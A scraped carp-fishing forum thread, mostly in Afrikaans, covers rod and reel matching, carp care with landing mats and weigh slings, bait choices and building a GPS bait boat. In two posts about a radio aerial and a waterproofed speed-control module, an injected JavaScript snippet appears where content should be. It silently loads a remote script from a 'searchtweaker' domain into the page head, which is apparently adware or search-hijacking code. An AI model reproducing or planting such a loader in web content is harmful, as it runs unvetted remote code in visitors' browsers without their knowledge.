Hey Guys, Thought I would compile a starters g

Oom G

New member
Om die regte katrol by die regte stok te he maak n' groot verskil...!...Dit help nie jy sit n' klein katrol op n' lang stok nie want die oomblik as jy begin ver gooi, gaan jy uit lyn uit hardloop op jou katrol en dis nie ideaal nie, glad nie..!
Dink nou jy tel n' groot vis op, maar jy'd 80% van jou lyn af gegooi, hoe gaan jy daai vis speel...? kanse verdubbel dat jy hom kan verloor oor jy meer stremming op hom sit
oor jou lyn te min raak en jy'd nie beweeg ruimte nie ens ens ens....dikte van lyn op jou katrol bepaal hoeveel lyn op jou katrol kan kom ens...

Ek glo jou dat jou hengel winkel waar jy jou goed koop behoort vir jou te kan aandui watter katrol by watter stok pas...

Die lang en kort van die saak is... (oewer hengel), kort stok-klein katrol, lang stok- groter of groot katrol....((r(e(ling
 
Naruto

Sealiner
Karoo85 wrote:
En dis wat gebeur as jy na gouie raad luister!

Nou het ek weer julle hulp nodig, wat skat julle sy gewig? Ek glo nie juis in n "lip gripper" nie so dis maar altyd n geraai........

Pragtige vis! Los maar die lip gripper by die huis. As jy n vis wil weeg kan jy hom altyd in jou skepnet weeg. Minimale skade aan die vis. Dis moeilik om daai gewig te skat....
 
DanielCPT

Member
Goeie more Sealiners. Ek het onlangs hier aangesluit nadat ek aangesluit het by 'n klein varswater klub. Ek het 'n paar vrae aangaande nadat die vis gevang is:

Watter prosedures word gevolg om die vis uit die water te kry en die hoek uit te haal?

Ons moet al ons visse wat ons vang hou tot die einde van die vang sessie sodat al die visse dan geweeg kan word. Wat is die regte manier om visse te hou sonder om hulle te beskadig?

Ek vra hierdie vrae, want iemand het op die klub se Facebook bladsy op 'n foto kommentaar gelewer oor hoe ons nie die visse reg behandel nie, en hy kan nie glo ons laat toe dat daar gras op die visse kom nie.

laastens, watter metode word gebruik om karp te weeg?

Ek geniet visvang verskriklik en will graag verseker ek doen alles reg om die visse so min as moontlik ongerief te gee.

Dankie vir julle tyd.
 
Fishpaste

Sealiner
DanielCPT wrote:

Hi DanielCPT,

Wat jy ge-experience het met die facepage comments sal nie die 1ste of die laaste wees nie. Dit is baie objective en maak nie saak hoeveel care jy vat nie, daar is altyd iemand wat iets te se sal het en gewoonlik kom dit maar van die "non-anglers" dink ek persoonlik. Jou mede hengelaar sal ook natuurlik iets te se het en die meeste van die tyd kom dit uit as n “pakslae" maar is werklik n observation en probeer hulle om mekaar te educate oor beter fish care...

Anyway, ek behoort nie aan n club nie, maar ek het so n rukkie terug n GROOT vierkantige net gesien by Mias in Woodmead wat bestaan uit die selfde material waarvan die specimen carp release sake van gemaak word. Ek kan nie n prys onthou nie maar dit was regtig baie goedkoop. Ek dink dit lyk na n goeie opsie persoonlik maar ek is seker iemand anders kan dalk help.

My opinion: Hoe groter die net hoe meer plek is daar vir die visse, hoe sagter die material van die net hoe beter is dit vir die visse.
Ek is ook nie n fan van al die visse op die gras uitstrooi om een gesamentlike foto te neem nie. Alhoewel ek al so gemaak het vroeer jare… As jy n klomp visse op die gras strooi en eers fotos neem en dan 1 vir 1 terug in die water sit, hoe lank le van hulle daar in die son en droogbak…?

Dis maar my 2c’s
 
Oom G

New member
CARP CARE IS BAIE BELANGRIK!!
n' Goeie begin is deur om die Oewerhengelaar te koop en te kyk watter produkte op die mark is ten opsigte van sulke geriewe soos nette, skep nette ens.... En dan, vra jou lokale hengel winkel vir hulp tot sulke produkte.
Wat wel n' groot taboo is, is die ou tipe(die staal tipe)nette!, Ek het so n' tydjie terug n' man langs die water gekry met een van daai, en was dit nie n' teleurstelling om te sien hoe die vis binne die net gelyk het toe ek hom uit die water haal nie... gelukkig het sy portuur teen hom getel, want dit was nie vreeslik moeilik om sy visse terug te gooi nie... LoL!:X en was hy nie parmantig oor ek sy vis terug gegooi het nie...:cens

Enige Hengelaar, wat sy sin werd is, sal jou help en lei om Carp care toe te pas...en dan kry jy daai mense met die IK van n' brandsiek muishond, want jy skerm so weg oor al die K!@#$#$K wat hul praat, dit jou skoon naar maak...:blah

Welkom by hengel DanielCPT, ek belowe jou dis die ondervinding, die moeite werd..!!:welk1
 
DanielCPT

Member
Dankie Oom G en F1

Die enige tyd wat die vis op die gras gelê het, was toe die skep net op die grond gesit was en die hoek uit die vis se mond gehaal is. Dit was nie eens 10 sekondes nie, maar omdat daar 'n paar gras blare sigbaar was op die foto was dit 'n storie.

In elk geval, ek het maar nog baie om te leer, ek gebruik tans 'n sagte, groot hou-net, geen staal lol. Is 'n landing-mat noodsaaklik? en wat is die beste (veiligste) manier om 'n karp te weeg?
 
Fishpaste

Sealiner
Hi DanielCPT,
Ek sal aanbeveel n landing mat waarop jy die vis kan le, wat hom nat hou, terwyl jy die hoeke uithaal ens. Dan kry jy ook goeie weigh slings wat die vis natterig hou, en beskerm, terwyl hy geweeg word.
Ons praat hier nou van die toerusting wat meestal val onder spesie hengel en daar is niks wat jou gaan stop om dit te gebruik nie, inteendeel sal dit eerder aanbeveel word.
Daar is altyd n ou geldjie aan alles verbonde, maar jy kan n landing mat en n weigh sling kry vir amper next to nothing these days. Try Ganis in witbank vir goeie pryse en hulle pos ook. Ek sal hulle enige tyd aanbeveel. Praat met Hussain, hy is baie baie nice en gaan nie jou geld probeer steel nie! Bel hulle gerus want die website wys nie alles wat hulle het nie.
 
LeonK

Member
DanielCPT wrote:
Goeie more Sealiners. Ek het onlangs hier aangesluit nadat ek aangesluit het by 'n klein varswater klub. Ek het 'n paar vrae aangaande nadat die vis gevang is:

Watter prosedures word gevolg om die vis uit die water te kry en die hoek uit te haal?

Ons moet al ons visse wat ons vang hou tot die einde van die vang sessie sodat al die visse dan geweeg kan word. Wat is die regte manier om visse te hou sonder om hulle te beskadig?

Ek vra hierdie vrae, want iemand het op die klub se Facebook bladsy op 'n foto kommentaar gelewer oor hoe ons nie die visse reg behandel nie, en hy kan nie glo ons laat toe dat daar gras op die visse kom nie.

laastens, watter metode word gebruik om karp te weeg?

Ek geniet visvang verskriklik en will graag verseker ek doen alles reg om die visse so min as moontlik ongerief te gee.

Dankie vir julle tyd.

daniel moenie dat hengel vir jou n nagmerrie word agv ander se kommentaar nie.
ja carp friendly is belangrik maar ongelukkig as n konvensionele hengelaar is daar tog net soveel wat jy kan doen.
kry vir jou een van daai nuwe hounette vir tydens kompetisies maar as jy social los dit by die huis.
maak seker die net is in diepgenoeg water
gaan skep die vis in tenminste kniediep water en moet hom nie uitsleep nie
nadat jy n vis geskep het, sit hom op n sagte area neer voor jy die hoek verwyder - niks fout met gras nie.

dis maar van die klein basiese dinge waarna mens moet kyk.

vir watse klub hengel jy?
 
DanielCPT

Member
Goeie dag Leon

Dankie vir jou insette, ek het maar F1 se raad gevolg en 'n landing mat aangeskaf. Ag, kyk kommentaar gaan nou nie my liefde vir hengel bederf nie, maar ek is altyd gretig om te leer en dus vra ek maar die vrae hier.

Ek behoort aan False Bay Freshwater Bank Angling Club. Dis 'n baie jong klub, ek dink hulle het maar hierdie jaar begin.

Ons vang hierdie Sondag by Paarl dam, sien uit na lekker dag van visvang, gees en goeie vriende.
 
jacque1983

New member
Hi guys

Thank you for all the advice. It is true what they say we never to old to learn. Im restarting my fishboxes. Any advice to what I should have? I got at the moment 30 dips, 25 balldips, 15 mielies and 25 types of floaties. I want to restart so what flavours and types would you guys suggest?

thank you guys

Great topic
 
Oom G

New member
Hi J..1983,
Welcome back to the angling front... :)
Regarding the dips.... check out some of the topics at the conventional carp section (fresh water section).. There's loads of info on what dips, where, how, time of year... take some time to check out those links and they should help you with your choice... :)
 
Rob O

New member
Hi there, I,ve just joined this site and the first article I read is your article for beginners, I,m not a novice fisherman but have fished most of my life deep sea, due to circumstances I now life in Gauteng and will now fish fresh water. due to a back opp I'm not happy with casting so am about to purchace a Bait Boat, do you know someone I could contact about how to go about dropping bait at the same spot everytime etc. Thank you for the advice in your article, it has already changed my mind set as to how and what to do. Thanks Rob O
 
D5

Senior Member
Hi Rob , to drop bait every time at exact spot,  that feature can set you up for some serious bucks , you need GPS for bait boat or  a fish-finder with GPS for bait boat.
You can see how Germans are doing it.

http://www.carplounge.de/xtcommerce/index.php?cat=c6_Fishfinder---GPS.html

I am building similar bait boat and it already set me nearly to R 12k . It is better to buy already made up bait boat then going route to build it yourself . Unless you have lots of time and needed skills to install GPS or a fish finder.
 
Morning to you, which radio would you suggest, I have an Optic 2.4 and a Futaba 35 meg FM radio, I've heard conflicting stories like the 2.4 can lose signal if the boat is behind a swell. What is your recommendation. Thanks Rob
 
D5

Senior Member
Radio

It is true that 2.4Mhz may have problem on choppy water and longer distance.
Problem is solved with this aerial.

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
 
Attachments

  • BB 2.JPG
    BB 2.JPG
    14.6 KB · Views: 107

Rob O

New member
Hi, thanks very much, I'll ask around to see who can supply such a aerial, so without the GPS or Fish Finder, I'll try with a Line/meter counter to drop the bait. Thanks again, hope to meet you some day.Rob
 
D5

Senior Member
I decided to make reliable boat.

What I done , I encapsulated ESC ( speed control) with battery , receiver and 6V dc/dc converter.
Why ? to not get moisture or get wet. the whole module is powered by 12V 1.7 NiCd Sanyo Cadnica battery pack.

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
 
Attachments

  • BB 10.JPG
    BB 10.JPG
    46.9 KB · Views: 106
Top